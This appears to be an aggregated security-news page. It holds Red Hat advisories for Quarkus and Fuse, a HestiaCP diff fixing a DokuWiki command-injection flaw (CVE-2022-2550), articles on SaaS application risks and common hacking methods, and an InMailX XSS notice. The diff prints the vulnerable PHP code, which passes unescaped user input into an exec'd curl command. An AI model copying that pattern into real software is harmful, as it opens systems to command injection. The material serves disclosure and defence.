Red Hat Security Advisory 2022-5596-01 - This release of Red Hat build of Quarkus 2.7.6 includes security updates, bug fixes, and enhancements. Issues addressed include a denial of service vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat build of Quarkus 2.7.6 release and security updateAdvisory ID:       RHSA-2022:5596-01Product:           Red Hat build of QuarkusAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:5596Issue date:        2022-07-19CVE Names:         CVE-2020-36518====================================================================1. Summary:An update is now available for Red Hat build of Quarkus. Red Hat ProductSecurity has rated this update as having a security impact of Moderate. ACommon Vulnerability Scoring System (CVSS) base score, which gives adetailed severity rating, is available for each vulnerability. For moreinformation, see the CVE links in the References section.2. Description:This release of Red Hat build of Quarkus 2.7.6 includes security updates,bugfixes, and enhancements. For more information, see the release notes pagelistedin the References section.Security Fix(es):* CVE-2020-36518 jackson-databind: denial of service via a large depth ofnested objects [quarkus-2]3. Solution:Before applying the update, back up your existing installation, includingallapplications, configuration files, databases and database settings, and soon.The References section of this erratum contains a download link for theupdate.You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects5. References:https://access.redhat.com/security/cve/CVE-2020-36518https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/2.7/https://access.redhat.com/articles/49661816. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBYuFkTtzjgjWX9erEAQhVwA/9HDoYsZc/1EEAG+m5aEGmL4Y+xh4focYSdXKiKg6BTY/GvdCkxseYf4rGsQqEagQ6eEqJNJHFDY8RJsg/hnhz57W0cUprZzC0HGa6iPBylPII5PBZ0kwjVpezz1onEWJ4TTd19fvlKrL5DCRT4ftlVl4N+ER9l4Ig0NRJ2C12tLs7Qe9U4Wl6+pP5OppxMx1chOH4i3TlRfJDDBLqbzrNnjs4WZvMl5bCKQwzT1l4dMBai2elzkmW4uizkSPrYQ/DYubUk2gctqDb0h5NURMWXC1Pxdiah+uNOgAa+HtNMzob7SkcUTQzO2M+z/8vsDnnOjq4mVAUhBMHKgDJv0d6/YRoyH4HMOeXYBurEbM4TWTCyeeSCCdScMKyKJXlgRf7gm5rVJC77jnB1T/HgrlzgUTtgq/YGk8e5RJqvUgGNSfIjqVP8BnzRoOr05kOemc2591FD+koFF0/Vt8VylMs4S0FRNCKq/bO/uznpR595k8oGTdeHDXJ9zczyIiUQU/J/JNPdTuAVB6c0aaec8wYQ2h75bl/5C8pTsQ3pVidzccmLorNoNKARsEDj8QU8KacvV475oLAA/6LQrOEpKTl3I3EcKX8FhLumjHb6gEYQMuON6RuIS2G3cOERLkRuEMYJpZgOCsIZ1zIiNH+7s85qmtA1R2Zmcbe3FiPyr0wEi8=Tk+0-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5596-01

Red Hat Security Advisory 2022-5532-01 - This release of Red Hat Fuse 7.11.0 serves as a replacement for Red Hat Fuse 7.10 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include HTTP request smuggling, bypass, code execution, denial of service, deserialization, information leakage, memory leak, privilege escalation, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Fuse 7.11.0 release and security update  
Advisory ID:       RHSA-2022:5532-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5532  
Issue date:        2022-07-07  
CVE Names:         CVE-2020-7020 CVE-2020-9484 CVE-2020-15250  
                   CVE-2020-25689 CVE-2020-29582 CVE-2020-36518  
                   CVE-2021-2471 CVE-2021-3629 CVE-2021-3642  
                   CVE-2021-3644 CVE-2021-3807 CVE-2021-3859  
                   CVE-2021-4178 CVE-2021-22060 CVE-2021-22096  
                   CVE-2021-22119 CVE-2021-22569 CVE-2021-22573  
                   CVE-2021-24122 CVE-2021-25122 CVE-2021-25329  
                   CVE-2021-29505 CVE-2021-30640 CVE-2021-33037  
                   CVE-2021-33813 CVE-2021-35515 CVE-2021-35516  
                   CVE-2021-35517 CVE-2021-36090 CVE-2021-38153  
                   CVE-2021-40690 CVE-2021-41079 CVE-2021-41766  
                   CVE-2021-42340 CVE-2021-42550 CVE-2021-43797  
                   CVE-2021-43859 CVE-2022-0084 CVE-2022-1259  
                   CVE-2022-1319 CVE-2022-21363 CVE-2022-21724  
                   CVE-2022-22932 CVE-2022-22950 CVE-2022-22968  
                   CVE-2022-22970 CVE-2022-22971 CVE-2022-22976  
                   CVE-2022-22978 CVE-2022-23181 CVE-2022-23221  
                   CVE-2022-23596 CVE-2022-23913 CVE-2022-24614  
                   CVE-2022-25845 CVE-2022-26336 CVE-2022-26520  
                   CVE-2022-30126  
====================================================================  
1. Summary:

A minor version update (from 7.10 to 7.11) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.11.0 serves as a replacement for Red Hat  
Fuse 7.10 and includes bug fixes and enhancements, which are documented in  
the Release Notes document linked in the References.

Security Fix(es):

* fastjson (CVE-2022-25845)

* jackson-databind (CVE-2020-36518)

* mysql-connector-java (CVE-2021-2471, CVE-2022-21363)

* undertow (CVE-2022-1259, CVE-2021-3629, CVE-2022-1319)

* wildfly-elytron (CVE-2021-3642)

* nodejs-ansi-regex (CVE-2021-3807, CVE-2021-3807)

* 3 qt (CVE-2021-3859)

* kubernetes-client (CVE-2021-4178)

* spring-security (CVE-2021-22119)

* protobuf-java (CVE-2021-22569)

* google-oauth-client (CVE-2021-22573)

* XStream (CVE-2021-29505, CVE-2021-43859)

* jdom (CVE-2021-33813, CVE-2021-33813)

* apache-commons-compress (CVE-2021-35515, CVE-2021-35516, CVE-2021-35517,  
CVE-2021-36090)

* Kafka (CVE-2021-38153)

* xml-security (CVE-2021-40690)

* logback (CVE-2021-42550)

* netty (CVE-2021-43797)

* xnio (CVE-2022-0084)

* jdbc-postgresql (CVE-2022-21724)

* spring-expression (CVE-2022-22950)

* springframework (CVE-2021-22096, CVE-2021-22060, CVE-2021-22096,  
CVE-2022-22976, CVE-2022-22970, CVE-2022-22971, CVE-2022-22978)

* h2 (CVE-2022-23221)

* junrar (CVE-2022-23596)

* artemis-commons (CVE-2022-23913)

* elasticsearch (CVE-2020-7020)

* tomcat (CVE-2021-24122, CVE-2021-25329, CVE-2020-9484, CVE-2021-25122,  
CVE-2021-33037, CVE-2021-30640, CVE-2021-41079, CVE-2021-42340,  
CVE-2022-23181)

* junit4 (CVE-2020-15250)

* wildfly-core (CVE-2020-25689, CVE-2021-3644)

* kotlin (CVE-2020-29582)

* karaf (CVE-2021-41766, CVE-2022-22932)

* Spring Framework (CVE-2022-22968)

* metadata-extractor (CVE-2022-24614)

* poi-scratchpad (CVE-2022-26336)

* postgresql-jdbc (CVE-2022-26520)

* tika-core (CVE-2022-30126)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

Installation instructions are available from the Fuse 7.11.0 product  
documentation page:  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

4. Bugs fixed (https://bugzilla.redhat.com/):

1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE  
1887810 - CVE-2020-15250 junit4: TemporaryFolder is shared between all users across system which could result in information disclosure  
1893070 - CVE-2020-25689 wildfly-core: memory leak in WildFly host-controller in domain mode while not able to reconnect to domain-controller  
1893125 - CVE-2020-7020 elasticsearch: not properly preserving security permissions when executing complex queries may lead to information disclosure  
1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system  
1930291 - CVE-2020-29582 kotlin: vulnerable Java API was used for temporary file and folder creation which could result in information disclosure  
1934032 - CVE-2021-25122 tomcat: Request mix-up with h2c  
1934061 - CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence)  
1966735 - CVE-2021-29505 XStream: remote command execution attack by manipulating the processed input stream  
1973413 - CVE-2021-33813 jdom: XXE allows attackers to cause a DoS via a crafted HTTP request  
1976052 - CVE-2021-3644 wildfly-core: Invalid Sensitivity Classification of Vault Expression  
1977064 - CVE-2021-22119 spring-security: Denial-of-Service (DoS) attack via initiation of Authorization Request  
1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS  
1981407 - CVE-2021-3642 wildfly-elytron: possible timing attack in ScramServer  
1981533 - CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy  
1981544 - CVE-2021-30640 tomcat: JNDI realm authentication weakness  
1981895 - CVE-2021-35515 apache-commons-compress: infinite loop when reading a specially crafted 7Z archive  
1981900 - CVE-2021-35516 apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive  
1981903 - CVE-2021-35517 apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive  
1981909 - CVE-2021-36090 apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive  
2004820 - CVE-2021-41079 tomcat: Infinite loop while reading an unexpected TLS packet when using OpenSSL JSSE engine  
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes  
2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients  
2010378 - CVE-2021-3859 undertow: client side invocation timeout raised when calling over HTTP2  
2011190 - CVE-2021-40690 xml-security: XPath Transform abuse allows for information disclosure  
2014356 - CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS  
2020583 - CVE-2021-2471 mysql-connector-java: unauthorized access to critical  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2033560 - CVE-2021-42550 logback: remote code execution through JNDI call from within its configuration file  
2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method  
2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries  
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI  
2046279 - CVE-2022-22932 karaf: path traversal flaws  
2046282 - CVE-2021-41766 karaf: insecure java deserialization  
2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors  
2047417 - CVE-2022-23181 tomcat: local privilege escalation vulnerability  
2049778 - CVE-2022-23596 junrar: A carefully crafted RAR archive can trigger an infinite loop while extracting  
2049783 - CVE-2021-43859 xstream: Injecting highly recursive collections or maps can cause a DoS  
2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes  
2055480 - CVE-2021-22060 springframework: Additional Log Injection in Spring Framework (follow-up to CVE-2021-22096)  
2058763 - CVE-2022-24614 metadata-extractor: Out-of-memory when reading a specially crafted JPEG file  
2063292 - CVE-2022-26336 poi-scratchpad: A carefully crafted TNEF file can cause an out of memory exception  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability  
2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2069414 - CVE-2022-22950 spring-expression: Denial of service via specially crafted SpEL expression  
2072339 - CVE-2022-1259 undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629)  
2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures  
2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability  
2081879 - CVE-2021-22573 google-oauth-client: Token signature not verified  
2087214 - CVE-2022-22976 springframework: BCrypt skips salt rounds for work factor of 31  
2087272 - CVE-2022-22970 springframework: DoS via data binding to multipartFile or servlet part  
2087274 - CVE-2022-22971 springframework: DoS with STOMP over WebSocket  
2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher  
2088523 - CVE-2022-30126 tika-core: Regular Expression Denial of Service in standards extractor  
2100654 - CVE-2022-25845 fastjson: autoType shutdown restriction bypass leads to deserialization

5. References:

https://access.redhat.com/security/cve/CVE-2020-7020  
https://access.redhat.com/security/cve/CVE-2020-9484  
https://access.redhat.com/security/cve/CVE-2020-15250  
https://access.redhat.com/security/cve/CVE-2020-25689  
https://access.redhat.com/security/cve/CVE-2020-29582  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-2471  
https://access.redhat.com/security/cve/CVE-2021-3629  
https://access.redhat.com/security/cve/CVE-2021-3642  
https://access.redhat.com/security/cve/CVE-2021-3644  
https://access.redhat.com/security/cve/CVE-2021-3807  
https://access.redhat.com/security/cve/CVE-2021-3859  
https://access.redhat.com/security/cve/CVE-2021-4178  
https://access.redhat.com/security/cve/CVE-2021-22060  
https://access.redhat.com/security/cve/CVE-2021-22096  
https://access.redhat.com/security/cve/CVE-2021-22119  
https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2021-22573  
https://access.redhat.com/security/cve/CVE-2021-24122  
https://access.redhat.com/security/cve/CVE-2021-25122  
https://access.redhat.com/security/cve/CVE-2021-25329  
https://access.redhat.com/security/cve/CVE-2021-29505  
https://access.redhat.com/security/cve/CVE-2021-30640  
https://access.redhat.com/security/cve/CVE-2021-33037  
https://access.redhat.com/security/cve/CVE-2021-33813  
https://access.redhat.com/security/cve/CVE-2021-35515  
https://access.redhat.com/security/cve/CVE-2021-35516  
https://access.redhat.com/security/cve/CVE-2021-35517  
https://access.redhat.com/security/cve/CVE-2021-36090  
https://access.redhat.com/security/cve/CVE-2021-38153  
https://access.redhat.com/security/cve/CVE-2021-40690  
https://access.redhat.com/security/cve/CVE-2021-41079  
https://access.redhat.com/security/cve/CVE-2021-41766  
https://access.redhat.com/security/cve/CVE-2021-42340  
https://access.redhat.com/security/cve/CVE-2021-42550  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2021-43859  
https://access.redhat.com/security/cve/CVE-2022-0084  
https://access.redhat.com/security/cve/CVE-2022-1259  
https://access.redhat.com/security/cve/CVE-2022-1319  
https://access.redhat.com/security/cve/CVE-2022-21363  
https://access.redhat.com/security/cve/CVE-2022-21724  
https://access.redhat.com/security/cve/CVE-2022-22932  
https://access.redhat.com/security/cve/CVE-2022-22950  
https://access.redhat.com/security/cve/CVE-2022-22968  
https://access.redhat.com/security/cve/CVE-2022-22970  
https://access.redhat.com/security/cve/CVE-2022-22971  
https://access.redhat.com/security/cve/CVE-2022-22976  
https://access.redhat.com/security/cve/CVE-2022-22978  
https://access.redhat.com/security/cve/CVE-2022-23181  
https://access.redhat.com/security/cve/CVE-2022-23221  
https://access.redhat.com/security/cve/CVE-2022-23596  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/cve/CVE-2022-24614  
https://access.redhat.com/security/cve/CVE-2022-25845  
https://access.redhat.com/security/cve/CVE-2022-26336  
https://access.redhat.com/security/cve/CVE-2022-26520  
https://access.redhat.com/security/cve/CVE-2022-30126  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.11.0  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuFkRNzjgjWX9erEAQg9LQ/9HYM6Ig0vTdDrN6ITdimAnjShWe/4Nyxx  
iZeg/VprKnpSQDRvNKIKUBuiKSggiTY4MZa3dXSJLkS57EyqZiWWTT2ADyN0Z6cm  
+sAQar6GTPg9eyZdMDeuM7plwQQZk8mzSj8aDN2QzHevnmNBlHlVE2MwpZmzVUjo  
O3/UhM4up60Z5Ryyk/4tWRry8wpj7rL9pW3HiVkxdHlDNijaxJ7PerXGItMpVytT  
0IVDwHz3jdJJH3/5uaeippUFu1S+L+75CwIUlvr25YIj3XQ4Sv1vdLvamf8j9P+8  
pVRnRyPl7vh2hXl8p2fby58LBINJKmUOOugeMWo2yoz9B4HQiTUOqXrOTe9nUD+P  
Ntx9YGTX6UhNG562eTAGGrKi0J0rd11FdqVfw12JeXWGqzYRfFW/UdKaRYCUQt24  
9O7FuzAHALe5Bcl7rGtKvbnY2DyLJ4AO3YdbskS502sTFjEfcdPObfQWaYniBBhx  
n8cmjdMB3bdGzpbPt/tlnYFNqdC9MSEn2J8kSlGMWP5Ntj5WYzReTiPAFY42dYpM  
gA4vqWNTn+lRAPm232u4CY9K7cDCz8Qdz22hoS21YulQXV+lDYyeyxCv0SwmG4yO  
rL5Uv5DOSmtH8UHa/vLTHKW7R59uuOLeAumfjRVxj52DJSCUTTGeKjBVTkjkpzq4  
rUyXD0vegnU=m5cz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5532-01

OS Command Injection in GitHub repository hestiacp/hestiacp prior to 1.6.5.

@@ -80,21 +80,28 @@ public function install(array $options = null, &$status=null)

  

$installUrl = $webDomain . "install.php";

  

$cmd = "curl --request POST "

. ($sslEnabled ? "" : "\--insecure " )

. "\--url $installUrl "

. "\--header 'Content-Type: application/x-www-form-urlencoded' "

. "\--data l=en "

. "\--data 'd\[title\]=" . $options\['wiki\_name'\] . "' "

. "\--data 'd\[acl\]=on' "

. "\--data 'd\[superuser\]=" . $options\['superuser'\] . "' "

. "\--data 'd\[fullname\]=" . $options\['real\_name'\] . "' "

. "\--data 'd\[email\]=" . $options\['email'\] . "' "

. "\--data 'd\[password\]=" . $options\['password'\] . "' "

. "\--data 'd\[confirm\]=" . $options\['password'\] . "' "

. "\--data 'd\[policy\]=" . substr($options\['initial\_ACL\_policy'\], 0, 1) . "' "

. "\--data 'd\[license\]=" . explode(":", $options\['content\_license'\])\[0\] . "' "

. "\--data submit=";

$cmd = implode(" ", array(

"curl",

"\--request POST",

($sslEnabled ? "" : "\--insecure "),

"\--url " . escapeshellarg($installUrl),

"\--header 'Content-Type: application/x-www-form-urlencoded'",

'--data-binary ' . escapeshellarg(http\_build\_query(array(

"l" => "en",

"d" => array(

"title" => $options\['wiki\_name'\],

'acl' => 'on',

'superuser' => $options\['superuser'\],

'fullname' => $options\['real\_name'\],

'email' => $options\['email'\],

'password' => $options\['password'\],

'confirm' => $options\['password'\],

'policy' => substr($options\['initial\_ACL\_policy'\], 0, 1),

'license' => explode(":", $options\['content\_license'\])\[0\]

),

'submit' => ''

)))

));

  

exec($cmd, $output, $return\_var);

if($return\_var > 0){

CVE-2022-2550: fix DokuWiki shell issue · hestiacp/hestiacp@3d4c309

IT admins can lock some of the obvious open doors in business applications, but system visibility is key. Build automatic monitoring defenses and adopt a Git-like tool so you can "version" your business apps to restore prior states.

Read some the cybersecurity headlines and you'll notice a trend: They increasingly involve business applications.

For example, the email tool Mailchimp says intruders broke into its customer accounts via an "internal tool." Marketing automation software HubSpot got infiltrated. Corporate password wallet Okta was compromised. Project management tool Jira made an update that accidentally exposed the private information of clients like Google and NASA.

This is one of cybersecurity's newest fronts: your internal tools.

It's only logical that malicious actors would intrude here next, or that employees would accidentally leave doors open. The average organization now has 843 SaaS applications and increasingly relies on them to run its core operations. I was curious about what administrators can do to keep these apps secure, so I interviewed an old colleague, Misha Seltzer, a CTO and co-founder of Atmosec, who is working in this space.

**Why Business Applications Are Particularly Vulnerable**

The users of business applications tend not to think about security and compliance. Partly, because that's not their job, says Misha. They're already plenty busy. And partly, it's because these teams try to purchase their systems outside of IT's purview.

Meanwhile, the apps themselves are designed to be easy to launch and integrate. You can launch many of them without a credit card. And users can often integrate this software with some of their most vital systems of record like the CRM, ERP, support system, and human capital management (HCM) with as little as one click.

This is true of most apps offered within those major vendors' app stores. Misha points out that Salesforce users can "connect" an app from the Salesforce AppExchange _without actually installing it_. That means there's no scrutiny, it can access your customer data, and its activities are logged under the user profile, making it difficult to track.

So, that's the first issue. It's very easy to connect new, potentially insecure apps to your core apps. The second issue is that most of these systems haven't been designed for administrators to observe what goes on within them.

For example:

*   **Salesforce** offers many wonderful DevOps tools, but no native way to track integrated apps, extend API keys, or compare orgs to detect suspicious changes.
*   **NetSuite's** changelog doesn't provide detail on who changed what — only _that_ something changed, making it difficult to audit.
*   **Jira's** changelog is equally sparse, and Jira is often integrated with Zendesk, PagerDuty, and Slack, which contain sensitive data.

This makes it difficult to know what's configured, which applications have access to what data, and who has been in your systems.

**What You Can Do About It**

The best defense is an automatic defense, says Misha, so talk to your cybersecurity team about how they can roll monitoring your business applications into their existing plans. But for complete awareness and coverage, they, too, are going to need deeper insight into what's happening within and between these applications than what these tools natively provide. You'll need to build or buy tools that can help you:

*   **Identify your risks:** You'll need the ability to view everything that's configured in each application, to save snapshots in time, and to compare those snapshots. If a tool can tell you the difference between yesterday's configuration and today's, you can see who has done what — and detect intrusions or the potential for intrusions.
*   **Probe, monitor, and analyze for vulnerabilities:** You need a way to set alerts for changes to your most sensitive configurations. These will need to go beyond traditional SaaS security posture management (SSPM) tools, which tend to monitor only one application at a time, or to only provide routine recommendations. If something connects to Salesforce or Zendesk and alters an important workflow, you need to know.
*   **Develop a response plan:** Adopt a Git-like tool that allows you to "version" your business applications to store prior states which you can then revert to. It won't fix every intrusion, and may cause you to lose metadata, but it's an effective first line of remediation.
*   **Maintain your SaaS security hygiene:** Deputize someone on the team with keeping your orgs up to date, deactivating unnecessary users and integrations, and ensuring that security settings that were turned off are turned back on — e.g., if someone disables encryption or TLS to configure a webhook, check that it was re-enabled.

If you can put all that together, you can start to identify areas that malicious actors could get in — such as through Slack's webhooks, as Misha points out.

**Your Role in Business System Security**

It's not up to administrators alone to secure these systems, but you can play an important role in locking some of the obvious open doors. And the better you're able to see into these systems — a chore which they aren't always natively built to allow — the better you'll know if someone hacked a business application.

The Great BizApp Hack: Cyber-Risks in Your Everyday Business Applications

By Owais Sultan
The advent of the digital age is a source of blessing in a way that makes life easier…
This is a post from HackRead.com Read the original post: Ways Hackers Can Steal Information from Your Device

****The advent of the digital age is a source of blessing in a way that makes life easier yet, it comes with some challenges including malicious hackers and cyber attacks.****

The threats posed by hackers to organizations and individuals have become a major concern as those fraudulent elements keep on increasing and devising new methods of perpetrating their sinister acts.

According to research by a software testing firm, not less than 30,000 websites are hacked daily worldwide and every 39 seconds there is a new cyber-attack launched at someone on the web. 

Let’s dig deeper into how hackers operate and how you can protect yourself from cyber attacks and scams.

Social engineering is a tricky one! Hackers can manipulate you by posing as someone you know and compel you to take action if they want to steal your information. For example, they may send you a link from a hacked social media profile, and create urgency by asking you to take some action.

After you click the link, you will be taken to a page that will require you to sign in to your Google or Apple, or similar account. But the form does not login to your account, it will instead be a fake login page created by crooks to steal your login credentials.

A recent example of a successful social engineering attack includes the Singaporean identity fraud scammer Ho Jun Jia (a/k/a Matthew Ho, a/k/a, Prefinity a/k/a Ethereum Vendor) who is now in prison for scamming in the name of the co-founder and co-chairman of Riot Games Mr. Marc Merrill.

Ho also used social engineering skills to trick Google and Amazon Web Services (AWS) into providing $5.4 million worth of cloud computing services by using personal details of Merrill.

**Keylogger**

Keylogger is designed to secretly spy on victims and can capture everything you type on your keyboard and every command you execute. It captures your passwords, credit card numbers, keystrokes, and browsing history.

It is worth noting that a keylogger can be software or a hardware device such as a malicious USB.

Software Keyloggers sneak into your computer system via harmful links or attachments. A hardware-based keylogger can be installed on your device if attackers have physical access to your computer.

**Public Wi-Fi Eavesdropping**

Wi-Fi eavesdropping can be defined as the act whereby your vital data is stolen by a hacker after exploiting an unsecured public Wi-Fi network. Because some public Wi-Fi allow unsecured transmission of data, your vital information, and files that are unencrypted are at the risk of hackers.

One of the gimmicks used by hackers is that they would name their hotspot after the name of the business premises or shopping mall etc. The Wi-Fi will probably be free and without a password so you are tempted to go for freebies. 

Once you connect to the hacker’s Wi-Fi, the hacker can see everything you do and steal your personal information including passwords. You can avoid this by not using public Wi-Fi, using your own hotspot device plus enabling your VPN at all times.

**SIM Swap Fraud**

A SIM swap attack is when a cybercriminal(s) calls your network provider and impersonates you. They claim that your SIM card is lost and they want to port your number to a new hacker-controlled SIM card.

Of course, your network provider will ask some questions to identify the person requesting the swap. These questions can be easily answered based on the Infomation you have provided about yourself on your social media accounts. (Don’t share your personal information on social media).

In this age of two-factor authentication (2FA) and USSD banking, your SIM card is coveted by hackers. This is because when they get your SIM card, they can bypass 2FA and intercept OTP (one-time password) as the verification code is sent to your swapped phone number.

Equity and forex trading brokerages also offer online trading apps that use 2FA to verify and authenticate users. When your SIM has been swapped, this verification code goes straight to the hacker who now controls your phone number.

Once the attacker has the verification code, they can link a new account to your investment, crypto wallet, or trading app and wire funds out. They can also use the funds in your account to buy worthless shares from other scammers thus enriching them and impoverishing you.

**Browser Hijacking**

An attacker can install malware right into your internet browser without you even knowing. This can happen when you click on an unknown link or download an app from a 3rd-party store. Most of the apps available in such stores are Trojans meaning they are not what they claim to be. By installing them, you could install a virus into your browser as well.

The virus in your browser then begins to redirect you to hacker-controlled sites that resemble legitimate sites. From there, your passwords are collected and used to access your accounts. 

**IP Spoofing**

This is the act whereby a hacker hijacks your browsing connection through the usage of a fake Internet Protocol (IP) address. A publication by Dell Technologies shows that there are over 30,000 spoofing attacks every day around the world.

IP spoofing scams mostly occur at a location where internal systems trust one another in a way that users can have access without any username or password, provided they are connected with the network.

It involves the act of masquerading as a fake computer IP address in a way that would look like a legitimate one. In the course of IP spoofing, attackers convey a message to a computer system with a fake IP address which shows that the message is coming from a different IP address. 

**Domain Name System (DNS) Spoofing/ Poisoning**

The term ‘spoofing’ has to do with impersonation. In this case, a hacker’s computer is impersonating a legitimate computer on a network. A domain name is simply a website name like ‘www.google.com’

DNS spoofing, let’s assume you want to visit Twitter and you type the domain name ‘www.twitter.com’ into your browser’s URL bar. This domain name is sent to a DNS server which converts the domain name of Twitter into an IP address example 172.28.213.15 which is supposed to be the IP address of Twitter’s official computer server.

The hacker spoofs it by deceiving the DNS server to convert Twitter’s domain name into a **different** hacker-controlled IP address which takes you to the hacker’s server instead of Twitter’s server.

The attackers could have designed a fake Twitter page and hosted it on his spoofed server. Once you attempt to log in, they can steal your password and use it to access your account. 

The result of DNS poisoning is that any information you send is routed through the hacker before it gets to the web. This allows them to steal your passwords and access your accounts. 

**Domain Spoofing**

This online fraud, also known as a homograph attack occurs when a hacker makes use of a domain name that greatly resembles the website you are trying to visit.  Perpetrating this act, the hacker replaces the characters in the fake domain name with other non-ASCII characters that look much alike in appearance.

It will be designed in such a way that you may not notice the difference, as you would be assured about the secure connection of the browser. To begin the process of HTTP spoofing, the cyber attacker’s first step is to register a domain name that resembles yours.

The scammer would then proceed to send a link to you, and you may likely not notice that you are visiting a fake version of the site you planned to go to because the majority of browsers display puny code host names in their address bar. One such example is:

It’s Google.com not ɢoogle.com

This scamming system is designed to even prove to you that the website’s SSL certificate is real, thereby preventing you from detecting the fraud.

**Session Hijacking**

When you visit a website, you might notice a popup prompting you to allow cookies. Cookies refer to your personal information stored temporarily in your computer’s cache memory and are deleted after you leave the site. _(Here’s how to disable Cookies notice for good)_.

Cookies contain a unique ‘session ID’ number which if gotten by a hacker, will enable them to take over your session. An attacker can steal your cookies using different means such as phishing scams where they send you an email containing a malicious link. When you click on the link, it will install malware for session hijacking.

The point here is, that once an attacker steals your cookie or gets your session ID, they can take over your browsing session and if you were visiting a bank website, they can steal your funds. You may notice the page freeze, or some technical difficulty while this is going on and when it’s over, your money is gone. 

**Don’t Be Caught Off Guard**

*   Never download files from suspicious emails, messages, or contacts. Also, never click a link shared by an unknown source, or enter your account details and password on websites that you don’t trust.
*   Ensure that your two-factor authentication is enabled. Or you can also use token-based logins.
*   Don’t send PINs, passwords, and your financial details via text or email.
*   To guard against IP Spoofing, ensure you use a Virtual Private Network (VPN). Or use anti-malware software with web protection, that blocks unknown websites.

Ways Hackers Can Steal Information from Your Device

InMailX Outlook Plugin < 3.22.0101 is vulnerable to Cross Site Scripting (XSS). InMailX Connection names are not sanitzed in the Outlook tab, which allows a local user or network administrator to execute HTML / Javascript in the Outlook of users.

**Enterprise Email Management, Compliance and Productivity Solution**

**inMailX** is an enterprise email management, compliance and productivity solution for Microsoft Outlook and Office 365, which provides the functionality and tools users need to effectively manage their emails and attachments.  inMailX integrates seamlessly with records and document management systems, cloud and network folder structures, helping users improve their email filing compliance.

With inMailX staff can improve their emails and attachments management compliance, productivity and the quality of work, while maintaining focus and reducing operational errors.  inMailX substantially enhances existing Outlook functionality and provides users with the ability to:

 - Manage emails and attachments using a simple and efficient interface  
 - Preview attachments when composing emails to ensure they are correct  
 - Clean metadata from Word, Excel PowerPoint, PDF and Image attachments  
 - Convert attachments to PDF 'on the fly' and prompt users to convert on send  
